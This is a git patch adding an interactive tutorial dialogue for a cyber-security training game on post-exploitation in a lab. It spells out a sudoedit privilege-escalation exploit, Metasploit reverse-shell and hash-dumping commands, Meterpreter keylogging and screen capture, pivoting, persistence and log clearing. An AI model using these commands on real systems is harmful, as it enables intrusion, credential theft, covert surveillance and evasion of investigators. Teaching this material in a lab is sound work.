From 1a0539d432583bf4e039f1852223f54c10553706 Mon Sep 17 00:00:00 2001 From: "Z. Cliffe Schreuders" Date: Wed, 19 Nov 2025 18:24:26 +0000 Subject: [PATCH] feat: Add GBL post-exploitation techniques lab sheet --- .../ink/lab_sheets/post_exploitation.ink | 906 ++++++++++++++++++ 1 file changed, 906 insertions(+) create mode 100644 story_design/ink/lab_sheets/post_exploitation.ink diff --git a/story_design/ink/lab_sheets/post_exploitation.ink b/story_design/ink/lab_sheets/post_exploitation.ink new file mode 100644 index 0000000..93b1fa1 --- /dev/null +++ b/story_design/ink/lab_sheets/post_exploitation.ink 
@@ -0,0 +1,906 @@ +// Post-exploitation Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/7_post-exploitation.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Thalita Vergilio +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR post_exploit_mastery = 0 + +// External variables +EXTERNAL player_name + +=== start === +Advanced Tactics Instructor: Welcome, Agent {player_name}. I'm your instructor for Post-Exploitation Techniques. + +~ instructor_rapport = 0 +~ post_exploit_mastery = 0 + +Advanced Tactics Instructor: Post-exploitation is what happens after you gain initial access. It's about leveraging that foothold to gather information, escalate privileges, and achieve your objectives. + +Advanced Tactics Instructor: Once an attacker has compromised a system, they can misuse the privileges they've appropriated to take further actions - or go on to compromise other connected systems. + +Advanced Tactics Instructor: This lab completes the attack lifecycle - from initial exploitation through privilege escalation, information gathering, and pivoting to other systems. + +Advanced Tactics Instructor: Remember: these are powerful techniques for authorized penetration testing and defensive security only. + +~ post_exploit_mastery += 10 + +-> post_exploit_hub + +=== post_exploit_hub === +Advanced Tactics Instructor: What aspect of post-exploitation would you like to explore? + ++ [What is post-exploitation?] 
+ -> post_exploit_intro ++ [Understanding shell access] + -> shell_access ++ [Assessing your level of access] + -> assessing_access ++ [Post-exploitation information gathering] + -> info_gathering ++ [Privilege escalation techniques] + -> privilege_escalation ++ [Using the sudo vulnerability (CVE-2023-22809)] + -> sudo_vulnerability ++ [Metasploit post-exploitation modules] + -> msf_post_modules ++ [Introduction to Meterpreter] + -> meterpreter_intro ++ [Meterpreter spyware features] + -> meterpreter_spyware ++ [Pivoting and port forwarding] + -> pivoting ++ [Maintaining access and covering tracks] + -> persistence_evasion ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== post_exploit_intro === +Advanced Tactics Instructor: Post-exploitation is everything that happens after you successfully compromise a system. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: The initial exploit gives you a foothold - usually limited access as whatever user account the vulnerable software was running as. + +Advanced Tactics Instructor: From there, you need to: +understand what level of access you have, gather information about the system, escalate privileges if possible, collect sensitive data, maintain access, and potentially pivot to other systems. + ++ [Why not just stop after getting shell access?] + Advanced Tactics Instructor: Initial access is often limited. You might be running as a low-privilege user, not an administrator. + + Advanced Tactics Instructor: You need to understand the system, find sensitive data, escalate to higher privileges, and ensure you can maintain access. + + Advanced Tactics Instructor: In a real penetration test, you're demonstrating impact - showing what an attacker could actually DO with that access. 
+ + Advanced Tactics Instructor: That means accessing sensitive files, dumping credentials, and potentially moving laterally to other systems. + + ~ instructor_rapport += 5 + ++ [What determines what you can do post-exploitation?] + Advanced Tactics Instructor: Several factors determine your capabilities: + + Advanced Tactics Instructor: First, the type of payload you used. A simple shell gives you command execution. Meterpreter gives you advanced features. + + Advanced Tactics Instructor: Second, the security context - what user account is the vulnerable software running as? + + Advanced Tactics Instructor: Third, the access controls in place. Are there additional restrictions beyond standard user permissions? + + Advanced Tactics Instructor: Finally, your skill at the command line and understanding of the operating system. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== shell_access === +Advanced Tactics Instructor: Shell access means you have access to a command line interface on the target system. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: On Windows, this is typically a Command Prompt or PowerShell. On Unix/Linux systems, it's usually a Bash shell. + +Advanced Tactics Instructor: Sometimes you'll see a familiar prompt. Other times you won't see any prompt at all, but you can still type commands and see output. + ++ [What can I do with shell access?] + Advanced Tactics Instructor: With shell access, you can run almost any command-line program available on the system. + + Advanced Tactics Instructor: You can list files, read documents, run scripts, check system information, create new files, and much more. + + Advanced Tactics Instructor: However, you're limited by the permissions of whatever user account you're running as. + + Advanced Tactics Instructor: If you're a normal user, you can't access administrator-only files or install system-wide software. + + ~ instructor_rapport += 5 + ++ [What commands should I avoid?] 
+ Advanced Tactics Instructor: Avoid interactive programs that expect keyboard input and draw to the screen. + + Advanced Tactics Instructor: For example, on Linux use "cat" instead of "less", because less expects you to scroll and press 'q' to quit. + + Advanced Tactics Instructor: Avoid programs that run continuously until stopped, like "ping" without a count limit. + + Advanced Tactics Instructor: Also be careful with Ctrl-C - it will likely kill your shell connection rather than just the current command. + + ~ instructor_rapport += 5 + ++ [What's the difference between shells on Windows and Linux?] + Advanced Tactics Instructor: Windows shells typically use backslashes in paths (C:\\Users\\), while Linux uses forward slashes (/home/). + + Advanced Tactics Instructor: Common Windows commands: dir, type, net user, whoami, ipconfig + + Advanced Tactics Instructor: Common Linux commands: ls, cat, whoami, id, ifconfig (or ip a) + + Advanced Tactics Instructor: The privilege model is different too - Windows has Administrator/System, Linux has root (UID 0). + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== assessing_access === +Advanced Tactics Instructor: The first question after exploitation is: what level of access do I have? + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: You need to determine what user account you're running as and what privileges that account has. + +Advanced Tactics Instructor: On Windows, you might have Administrator, System, or a regular user account. On Linux, you want to know if you're root (UID 0) or a normal user. + ++ [How do I check my access level on Linux?] + Advanced Tactics Instructor: Use these commands to assess your Linux access: + + Advanced Tactics Instructor: whoami - Shows your username + + Advanced Tactics Instructor: id - Shows your user ID (UID), group ID (GID), and groups + + Advanced Tactics Instructor: id -u - Shows just the UID. A UID of 0 means you're root! 
+ + Advanced Tactics Instructor: Any other UID means you're a normal user with standard access controls applying. + + ~ instructor_rapport += 5 + ++ [How do I check my access level on Windows?] + Advanced Tactics Instructor: On Windows, you can use: + + Advanced Tactics Instructor: whoami - Shows your username and domain + + Advanced Tactics Instructor: whoami /priv - Shows your privileges + + Advanced Tactics Instructor: net user USERNAME - Shows details about a user account + + Advanced Tactics Instructor: If you have Meterpreter: getuid and getprivs give detailed privilege information. + + ~ instructor_rapport += 5 + ++ [What if I don't have root or Administrator access?] + Advanced Tactics Instructor: That's very common! Most services run as unprivileged users for security reasons. + + Advanced Tactics Instructor: You can still access files that user can read, which might include sensitive data. + + Advanced Tactics Instructor: You can gather system information to look for privilege escalation opportunities. + + Advanced Tactics Instructor: On Linux, try accessing /etc/shadow - if you can't, that confirms you're not root. + + Advanced Tactics Instructor: Then you'll want to look for privilege escalation vulnerabilities. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== info_gathering === +Advanced Tactics Instructor: Information gathering continues even after exploitation. Understanding the system helps you plan your next moves. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: You want to learn about the operating system, installed software, network configuration, running processes, and other users. + ++ [What system information should I gather on Linux?] 
+ Advanced Tactics Instructor: Key commands for Linux information gathering: + + Advanced Tactics Instructor: uname -a (kernel version and architecture) + + Advanced Tactics Instructor: cat /proc/cpuinfo (CPU details) + + Advanced Tactics Instructor: free -h (memory usage) + + Advanced Tactics Instructor: df -h (disk usage and partitions) + + Advanced Tactics Instructor: env (environment variables) + + Advanced Tactics Instructor: cat /etc/passwd (list of user accounts) + + Advanced Tactics Instructor: This information helps you understand the target and identify potential attack vectors. + + ~ instructor_rapport += 5 + ++ [Why check the sudo version?] + Advanced Tactics Instructor: The sudo command allows users to run commands with elevated privileges. + + Advanced Tactics Instructor: Check the version with: sudo --version + + Advanced Tactics Instructor: Certain versions of sudo have critical security vulnerabilities that allow privilege escalation! + + Advanced Tactics Instructor: For example, CVE-2023-22809 affects sudo versions 1.8.0 through 1.9.12p1. + + Advanced Tactics Instructor: Finding a vulnerable sudo version is a goldmine for privilege escalation. + + ~ instructor_rapport += 5 + ++ [What network information is useful?] + Advanced Tactics Instructor: Network information reveals what other systems you might be able to reach: + + Advanced Tactics Instructor: ifconfig or ip a (network interfaces and IP addresses) + + Advanced Tactics Instructor: netstat -an or ss -an (active connections and listening ports) + + Advanced Tactics Instructor: route or ip route (routing table) + + Advanced Tactics Instructor: cat /etc/resolv.conf (DNS configuration) + + Advanced Tactics Instructor: This helps you identify other systems to pivot to or internal networks to explore. 
+ + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== privilege_escalation === +Advanced Tactics Instructor: Privilege escalation means gaining additional privileges you weren't intentionally granted. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Vertical privilege escalation is going from normal user to administrator/root. Horizontal privilege escalation is accessing resources of another user at the same privilege level. + +Advanced Tactics Instructor: Privilege escalation exploits vulnerabilities in the kernel, system software, or misconfigurations. + ++ [What are common privilege escalation vectors?] + Advanced Tactics Instructor: Common privilege escalation opportunities include: + + Advanced Tactics Instructor: Vulnerable kernel versions with known local exploits + + Advanced Tactics Instructor: Vulnerable system software like sudo, polkit, or services + + Advanced Tactics Instructor: Misconfigured SUID binaries on Linux + + Advanced Tactics Instructor: Weak file permissions on sensitive files + + Advanced Tactics Instructor: Scheduled tasks running as administrators + + Advanced Tactics Instructor: Credentials stored in plaintext or easily crackable formats + + ~ instructor_rapport += 5 + ++ [How do I find privilege escalation opportunities?] 
+ Advanced Tactics Instructor: Systematic enumeration is key: + + Advanced Tactics Instructor: Check kernel and software versions against CVE databases + + Advanced Tactics Instructor: Look for SUID binaries: find / -perm -4000 2>/dev/null + + Advanced Tactics Instructor: Check sudo permissions: sudo -l + + Advanced Tactics Instructor: Look for world-writable files in sensitive directories + + Advanced Tactics Instructor: Check for credentials in config files, bash history, and environment variables + + ~ instructor_rapport += 5 + ++ [Tell me about the sudo vulnerability] + -> sudo_vulnerability + +- -> post_exploit_hub + +=== sudo_vulnerability === +Advanced Tactics Instructor: CVE-2023-22809 is a critical sudo vulnerability affecting versions 1.8.0 through 1.9.12p1. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: The vulnerability is in sudoedit, which allows editing files with elevated privileges. + +Advanced Tactics Instructor: By manipulating environment variables, you can trick sudoedit into opening files you shouldn't have access to. + ++ [How does this vulnerability work?] + Advanced Tactics Instructor: The vulnerability exploits how sudoedit processes the EDITOR environment variable. + + Advanced Tactics Instructor: Normally, sudoedit restricts which files you can edit. But a coding mistake means you can use "--" to specify additional files. + + Advanced Tactics Instructor: For example: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + + Advanced Tactics Instructor: This tells sudoedit to use "cat" as the editor and tricks it into opening /etc/shadow with root privileges! + + Advanced Tactics Instructor: The /etc/hosts file is just a decoy to satisfy sudoedit's normal operation. + + ~ instructor_rapport += 5 + ++ [How can I use this to escalate privileges?] 
+ Advanced Tactics Instructor: First, you can read sensitive files: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + + Advanced Tactics Instructor: This gives you password hashes which you might crack offline. + + Advanced Tactics Instructor: More powerfully, you can edit the sudoers file: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts + + Advanced Tactics Instructor: Add a line like: distccd ALL=(ALL) NOPASSWD:ALL + + Advanced Tactics Instructor: This allows your user to run any command as root without a password: sudo -i + + Advanced Tactics Instructor: Now you're root! + + ~ instructor_rapport += 5 + ++ [What's tricky about exploiting this?] + Advanced Tactics Instructor: The challenge is that your simple shell doesn't support full interactive programs well. + + Advanced Tactics Instructor: When you use vim to edit /etc/sudoers, the display will be distorted and arrow keys won't work properly. + + Advanced Tactics Instructor: You need to carefully use vim commands without visual feedback: +"G" then "o" to go to bottom and insert new line, type your new line, "Esc" then ":x" to save. + + Advanced Tactics Instructor: Be very careful - if you corrupt /etc/sudoers, you'll break the VM! + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== msf_post_modules === +Advanced Tactics Instructor: Metasploit has numerous post-exploitation modules for automated information gathering and attacks. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: These modules run against established sessions to collect data, escalate privileges, or set up persistence. + +Advanced Tactics Instructor: They're categorized by operating system and function: gather, escalate, manage, recon, and more. + ++ [How do I use post-exploitation modules?] + Advanced Tactics Instructor: First, you need an active session. Background it with Ctrl-Z. 
+ + Advanced Tactics Instructor: Check your session ID: sessions + + Advanced Tactics Instructor: Select a post module: use post/linux/gather/checkvm + + Advanced Tactics Instructor: Set the session: setg SESSION 1 (or your session ID) + + Advanced Tactics Instructor: Using "setg" sets it globally, so you don't have to set it for each module. + + Advanced Tactics Instructor: Run the module: exploit (or run) + + ~ instructor_rapport += 5 + ++ [What useful post-exploitation modules exist?] + Advanced Tactics Instructor: For Linux targets, valuable modules include: + + Advanced Tactics Instructor: post/linux/gather/checkvm - Detect if running in a VM + + Advanced Tactics Instructor: post/linux/gather/enum_configs - Download config files + + Advanced Tactics Instructor: post/linux/gather/enum_network - Network configuration + + Advanced Tactics Instructor: post/linux/gather/enum_system - System and software information + + Advanced Tactics Instructor: post/linux/gather/enum_users_history - Command history and logs + + Advanced Tactics Instructor: post/linux/gather/hashdump - Dump password hashes + + ~ instructor_rapport += 5 + ++ [Where does collected information get stored?] + Advanced Tactics Instructor: Post-exploitation modules store collected data as "loot" in Metasploit's database. + + Advanced Tactics Instructor: The module output tells you where files are saved, usually in ~/.msf4/loot/ + + Advanced Tactics Instructor: You can view loot with: loot + + Advanced Tactics Instructor: Files are timestamped and categorized, making it easy to review later for report writing. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== meterpreter_intro === +Advanced Tactics Instructor: Meterpreter is an advanced payload originally developed by Matt Miller (Skape). + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Unlike a simple shell, Meterpreter provides a sophisticated remote administration framework with many built-in features. 
+ +Advanced Tactics Instructor: It's dynamically extensible - features can be loaded as needed. By default, it encrypts all communications. + ++ [What makes Meterpreter special?] + Advanced Tactics Instructor: Meterpreter has numerous advantages over basic shells: + + Advanced Tactics Instructor: Runs entirely in memory - doesn't write to disk, making forensics harder + + Advanced Tactics Instructor: Encrypted communications by default + + Advanced Tactics Instructor: Rich command set for file browsing, process manipulation, network operations + + Advanced Tactics Instructor: Can migrate between processes to hide or achieve persistence + + Advanced Tactics Instructor: Extensible with post-exploitation modules + + Advanced Tactics Instructor: Includes "spyware" features like keylogging and screen capture + + ~ instructor_rapport += 5 + ++ [How do I use Meterpreter commands?] + Advanced Tactics Instructor: Start by viewing available commands: help + + Advanced Tactics Instructor: Get current privileges: getuid and getprivs + + Advanced Tactics Instructor: Browse files: ls c:/ (Windows) or ls / (Linux) + + Advanced Tactics Instructor: Download files: download /path/to/file + + Advanced Tactics Instructor: Upload files: upload /local/file /remote/file + + Advanced Tactics Instructor: View processes: ps + + Advanced Tactics Instructor: Migrate to another process: migrate PID + + Advanced Tactics Instructor: Drop to a system shell: shell (Ctrl-D to return to Meterpreter) + + ~ instructor_rapport += 5 + ++ [How does Meterpreter avoid detection?] 
+ Advanced Tactics Instructor: Meterpreter is designed for stealth: + + Advanced Tactics Instructor: It stays in memory and doesn't write files to disk (fileless malware) + + Advanced Tactics Instructor: By default it masquerades as "svchost.exe" on Windows, a common legitimate process + + Advanced Tactics Instructor: It can migrate into other running processes, making it hard to identify + + Advanced Tactics Instructor: Communications are encrypted, making network monitoring less effective + + Advanced Tactics Instructor: However, modern endpoint detection systems can still identify Meterpreter through behavioral analysis. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== meterpreter_spyware === +Advanced Tactics Instructor: Meterpreter includes features typically associated with spyware - monitoring user activity without their knowledge. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: These features can capture keystrokes, screenshots, and even webcam feeds. + +Advanced Tactics Instructor: While concerning for privacy, they're useful for security testing to demonstrate the risk of compromise. + ++ [How does keylogging work in Meterpreter?] + Advanced Tactics Instructor: Meterpreter can capture all keystrokes on the target system. + + Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Explore → Log Keystrokes + + Advanced Tactics Instructor: Set CAPTURE_TYPE to "winlogon" to capture login attempts + + Advanced Tactics Instructor: Via command line: keyscan_start (then keyscan_dump to view results) + + Advanced Tactics Instructor: This captures everything typed - passwords, emails, documents, searches. + + ~ instructor_rapport += 5 + ++ [How do I capture screenshots?] 
+ Advanced Tactics Instructor: Screenshots show what the user is viewing: + + Advanced Tactics Instructor: screenshot - Captures current screen + + Advanced Tactics Instructor: The image is downloaded to your Kali system and automatically opened + + Advanced Tactics Instructor: This can reveal sensitive documents, credentials, or user behavior + + Advanced Tactics Instructor: In Armitage, there are menu options for screen capture in the Meterpreter menu. + + ~ instructor_rapport += 5 + ++ [Can I get full graphical control?] + Advanced Tactics Instructor: Yes! You can use VNC for full graphical remote control: + + Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Interact → Desktop (VNC) + + Advanced Tactics Instructor: Armitage starts a VNC server on the target and tells you the port + + Advanced Tactics Instructor: Connect with: vncviewer 127.0.0.1:PORT + + Advanced Tactics Instructor: You'll see and control the target's desktop just like sitting at their keyboard! + + Advanced Tactics Instructor: This is powerful but obvious to any user who's watching their screen. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== pivoting === +Advanced Tactics Instructor: Pivoting means using a compromised system as a stepping stone to attack other systems. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Often attackers can't directly reach internal systems - firewalls, NAT, and network segmentation block direct access. + +Advanced Tactics Instructor: But if you compromise a system that CAN reach those internal systems, you can route your attacks through it. + ++ [Why would I need to pivot?] 
+ Advanced Tactics Instructor: Several scenarios require pivoting: + + Advanced Tactics Instructor: Attacking internal systems from a compromised public-facing server + + Advanced Tactics Instructor: Accessing networks behind firewalls or NAT + + Advanced Tactics Instructor: Moving laterally through a corporate network + + Advanced Tactics Instructor: Hiding your true origin by routing through multiple compromised hosts + + Advanced Tactics Instructor: In real penetration tests, you often start from a DMZ server and need to pivot to reach critical internal systems. + + ~ instructor_rapport += 5 + ++ [How does Meterpreter pivoting work?] + Advanced Tactics Instructor: Meterpreter can set up routing so all your attacks go through a compromised host. + + Advanced Tactics Instructor: In Armitage: Right-click compromised host → Meterpreter → Pivoting → Setup → Add Pivot + + Advanced Tactics Instructor: Via command line, you use the "route" command in msfconsole + + Advanced Tactics Instructor: Once configured, any Metasploit attacks you launch will be routed through that system + + Advanced Tactics Instructor: The pivoted attacks will appear to come from the compromised system, not your Kali VM. + + ~ instructor_rapport += 5 + ++ [What's port forwarding?] + Advanced Tactics Instructor: Port forwarding is a simpler form of pivoting. + + Advanced Tactics Instructor: You instruct a compromised system to listen on a port and forward connections to a different host and port. + + Advanced Tactics Instructor: For example, forward local port 8080 to an internal web server on 10.0.0.5:80 + + Advanced Tactics Instructor: This makes the internal service accessible through the compromised system. 
+ + Advanced Tactics Instructor: Meterpreter's portfwd command handles this: portfwd add -l 8080 -p 80 -r 10.0.0.5 + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== persistence_evasion === +Advanced Tactics Instructor: Maintaining access and covering tracks are advanced post-exploitation techniques. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Persistence means ensuring you can regain access even if the system reboots or the service is restarted. + +Advanced Tactics Instructor: Covering tracks means removing evidence of the attack from logs and the filesystem. + ++ [How do attackers maintain access?] + Advanced Tactics Instructor: Common persistence mechanisms include: + + Advanced Tactics Instructor: Creating new user accounts with administrative privileges + + Advanced Tactics Instructor: Installing backdoors that run on boot (services, scheduled tasks, startup scripts) + + Advanced Tactics Instructor: Modifying SSH authorized_keys to allow your key + + Advanced Tactics Instructor: Installing rootkits that hide processes and files + + Advanced Tactics Instructor: Meterpreter has post-exploitation modules specifically for persistence. + + ~ instructor_rapport += 5 + ++ [How do you cover your tracks?] + Advanced Tactics Instructor: Covering tracks involves removing or modifying evidence: + + Advanced Tactics Instructor: Clearing log files (on Linux: /var/log/auth.log, /var/log/syslog, etc.) + + Advanced Tactics Instructor: Clearing command history (bash history, PowerShell history) + + Advanced Tactics Instructor: Removing uploaded tools and malware + + Advanced Tactics Instructor: Modifying file timestamps to match surrounding files + + Advanced Tactics Instructor: However, sophisticated forensics can often detect these modifications. + + ~ instructor_rapport += 5 + ++ [Does Meterpreter have anti-forensics features?] 
+ Advanced Tactics Instructor: Yes, Meterpreter is designed with anti-forensics in mind: + + Advanced Tactics Instructor: It runs in memory without writing to disk (fileless) + + Advanced Tactics Instructor: It can migrate between processes, making it hard to find + + Advanced Tactics Instructor: Communications are encrypted + + Advanced Tactics Instructor: There are modules to clear event logs: clearev + + Advanced Tactics Instructor: However, modern endpoint detection and response (EDR) tools can detect Meterpreter through behavioral analysis. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== commands_reference === +Advanced Tactics Instructor: Let me provide a comprehensive post-exploitation commands reference. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: **Initial Exploitation (Distcc example):** + +Advanced Tactics Instructor: nmap -p 1-65535 TARGET (scan all ports) + +Advanced Tactics Instructor: msfconsole + +Advanced Tactics Instructor: search distccd + +Advanced Tactics Instructor: use exploit/unix/misc/distcc_exec + +Advanced Tactics Instructor: set RHOST TARGET_IP + +Advanced Tactics Instructor: set PAYLOAD cmd/unix/reverse + +Advanced Tactics Instructor: set LHOST YOUR_IP + +Advanced Tactics Instructor: exploit + ++ [Show me access assessment commands] + Advanced Tactics Instructor: **Assessing Access Level:** + + Advanced Tactics Instructor: whoami (show username) + + Advanced Tactics Instructor: id (show UID, GID, groups) + + Advanced Tactics Instructor: id -u (show just UID - 0 means root) + + Advanced Tactics Instructor: cat /etc/shadow (try to read - if fails, not root) + + ~ instructor_rapport += 3 + ++ [Show me information gathering commands] + Advanced Tactics Instructor: **Information Gathering (Linux):** + + Advanced Tactics Instructor: env (environment variables) + + Advanced Tactics Instructor: uname -a (kernel version) + + Advanced Tactics Instructor: cat /proc/cpuinfo (CPU info) + + Advanced Tactics Instructor: 
free -h (memory) + + Advanced Tactics Instructor: df -h (disk space) + + Advanced Tactics Instructor: cat /etc/passwd (user accounts) + + Advanced Tactics Instructor: sudo --version (check for vulnerable sudo) + + Advanced Tactics Instructor: ifconfig or ip a (network interfaces) + + ~ instructor_rapport += 3 + ++ [Show me privilege escalation commands] + Advanced Tactics Instructor: **Privilege Escalation (CVE-2023-22809):** + + Advanced Tactics Instructor: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + + Advanced Tactics Instructor: (View password hashes) + + Advanced Tactics Instructor: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts + + Advanced Tactics Instructor: (Edit sudoers file - be very careful!) + + Advanced Tactics Instructor: In vim: Press Enter, type "Go", press Enter, type "distccd ALL=(ALL) NOPASSWD:ALL" + + Advanced Tactics Instructor: Press Esc, type ":x", press Enter, press Esc, type ":q!", press Enter + + Advanced Tactics Instructor: sudo -i (escalate to root) + + ~ instructor_rapport += 3 + ++ [Show me Linux admin commands] + Advanced Tactics Instructor: **Linux Post-Exploitation:** + + Advanced Tactics Instructor: useradd USERNAME (create user) + + Advanced Tactics Instructor: passwd USERNAME (set password) + + Advanced Tactics Instructor: cat /etc/passwd (list users) + + Advanced Tactics Instructor: sh (spawn command interpreter) + + ~ instructor_rapport += 3 + ++ [Show me Metasploit post modules] + Advanced Tactics Instructor: **Metasploit Post-Exploitation:** + + Advanced Tactics Instructor: Ctrl-Z (background session) + + Advanced Tactics Instructor: sessions (list sessions) + + Advanced Tactics Instructor: use post/linux/gather/checkvm + + Advanced Tactics Instructor: setg SESSION 1 + + Advanced Tactics Instructor: exploit + + Advanced Tactics Instructor: **Useful Post Modules:** + + Advanced Tactics Instructor: post/linux/gather/enum_configs + + Advanced Tactics Instructor: post/linux/gather/enum_network + + Advanced Tactics 
Instructor: post/linux/gather/enum_system + + Advanced Tactics Instructor: post/linux/gather/enum_users_history + + Advanced Tactics Instructor: post/linux/gather/hashdump + + ~ instructor_rapport += 3 + ++ [Show me Meterpreter commands] + Advanced Tactics Instructor: **Meterpreter Commands:** + + Advanced Tactics Instructor: help (list all commands) + + Advanced Tactics Instructor: getuid (current user) + + Advanced Tactics Instructor: getprivs (privileges) + + Advanced Tactics Instructor: ls c:/ (browse files) + + Advanced Tactics Instructor: download FILE (download file) + + Advanced Tactics Instructor: upload LOCAL REMOTE (upload file) + + Advanced Tactics Instructor: ps (list processes) + + Advanced Tactics Instructor: migrate PID (migrate to process) + + Advanced Tactics Instructor: shell (drop to system shell, Ctrl-D to return) + + Advanced Tactics Instructor: run post/windows/gather/hashdump (dump hashes) + + Advanced Tactics Instructor: screenshot (capture screen) + + Advanced Tactics Instructor: keyscan_start / keyscan_dump (keylogging) + + ~ instructor_rapport += 3 + ++ [Show me Armitage commands] + Advanced Tactics Instructor: **Armitage Setup:** + + Advanced Tactics Instructor: sudo msfdb reinit + + Advanced Tactics Instructor: sudo armitage & + + Advanced Tactics Instructor: **Armitage Workflow:** + + Advanced Tactics Instructor: Hosts → Add Host → enter IP + + Advanced Tactics Instructor: Right-click host → Scan + + Advanced Tactics Instructor: Drag exploit onto target icon → Launch + + Advanced Tactics Instructor: Right-click compromised host → Meterpreter → Interact + + Advanced Tactics Instructor: **Pivoting:** + + Advanced Tactics Instructor: Right-click → Meterpreter → Pivoting → Setup → Add Pivot + + ~ instructor_rapport += 3 + +- -> post_exploit_hub + +=== challenge_tips === +Advanced Tactics Instructor: Let me give you practical tips for the post-exploitation challenges. 
+ +~ instructor_rapport += 5 + +Advanced Tactics Instructor: **Exploiting Distcc:** + +Advanced Tactics Instructor: Scan all ports to find distcc: nmap -p- TARGET + +Advanced Tactics Instructor: Use exploit/unix/misc/distcc_exec with cmd/unix/reverse payload + +Advanced Tactics Instructor: You'll get a shell as the distccd user, not root. + ++ [Tips for privilege escalation?] + Advanced Tactics Instructor: Check the sudo version immediately: sudo --version + + Advanced Tactics Instructor: If it's vulnerable (1.8.0-1.9.12p1), use the CVE-2023-22809 exploit. + + Advanced Tactics Instructor: When editing /etc/sudoers with vim, follow the commands EXACTLY - one wrong keystroke can break the VM. + + Advanced Tactics Instructor: After editing sudoers, run: sudo -i to become root. + + Advanced Tactics Instructor: Verify with: id -u (should show 0) + + ~ instructor_rapport += 5 + ++ [Tips for using post-exploitation modules?] + Advanced Tactics Instructor: Always background your session first with Ctrl-Z + + Advanced Tactics Instructor: Use "setg SESSION ID" to set the session globally for all modules. + + Advanced Tactics Instructor: Run multiple enum modules to gather comprehensive information. + + Advanced Tactics Instructor: The output tells you where loot is stored - check those files! + + Advanced Tactics Instructor: Not all modules work perfectly - if one fails, move on to others. + + ~ instructor_rapport += 5 + ++ [Tips for using Meterpreter and Armitage?] + Advanced Tactics Instructor: Exploit the Windows server with easyftp to get a Meterpreter session. + + Advanced Tactics Instructor: Use getuid and getprivs to understand your privileges immediately. + + Advanced Tactics Instructor: Browse to user desktops to find flags: ls C:\\Users\\ + + Advanced Tactics Instructor: Try both Meterpreter commands and Armitage's GUI features. + + Advanced Tactics Instructor: If Meterpreter becomes unresponsive, restart the Windows VM and re-exploit. 
+ + ~ instructor_rapport += 5 + ++ [Tips for pivoting?] + Advanced Tactics Instructor: Set up a pivot through the Windows system to attack Linux. + + Advanced Tactics Instructor: In Armitage: Right-click Windows → Meterpreter → Pivoting → Setup → Add Pivot + + Advanced Tactics Instructor: Add the Linux target: Hosts → Add Hosts → enter Linux IP + + Advanced Tactics Instructor: Scan and exploit through the pivot - it will be slower but will work. + + Advanced Tactics Instructor: The Armitage interface shows the routing path visually. + + ~ instructor_rapport += 5 + ++ [Where are the flags?] + Advanced Tactics Instructor: Linux flags are in user home directories under /home/ + + Advanced Tactics Instructor: Use find /home -name "*flag*" to search for them. + + Advanced Tactics Instructor: Windows flags are on user Desktops: C:\\Users\\USERNAME\\Desktop\\ + + Advanced Tactics Instructor: One Linux challenge involves cracking a protected.zip file. + + Advanced Tactics Instructor: You'll need to dump password hashes and crack them to get the zip password. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== ready_for_practice === +Advanced Tactics Instructor: Excellent! You're ready for advanced post-exploitation techniques. + +~ instructor_rapport += 10 +~ post_exploit_mastery += 10 + +Advanced Tactics Instructor: This lab completes your understanding of the full attack lifecycle - from initial reconnaissance through exploitation to post-exploitation. + +Advanced Tactics Instructor: You'll exploit systems, escalate privileges, gather sensitive data, and pivot through networks. + +Advanced Tactics Instructor: Remember: these techniques are powerful and potentially destructive. Use them only for authorized penetration testing and defensive security. + ++ [Any final advice?] + Advanced Tactics Instructor: Work methodically. After each exploitation, assess your access, gather information, then escalate privileges. 
+ + Advanced Tactics Instructor: Take careful notes of what you find - credentials, software versions, vulnerable services. + + Advanced Tactics Instructor: When using the sudo privilege escalation, follow the vim commands EXACTLY. Practice on a non-critical system first if you're nervous. + + Advanced Tactics Instructor: Explore both Meterpreter commands and Armitage's interface to see which you prefer. + + Advanced Tactics Instructor: Don't get frustrated if something doesn't work - exploit reliability varies. Try restarting VMs and trying again. + + Advanced Tactics Instructor: Most importantly: understand WHY each technique works, not just HOW to execute it. + + Advanced Tactics Instructor: Good luck, Agent {player_name}. This is where you demonstrate the full impact of system compromise. + + ~ instructor_rapport += 10 + +- -> post_exploit_hub + +-> END
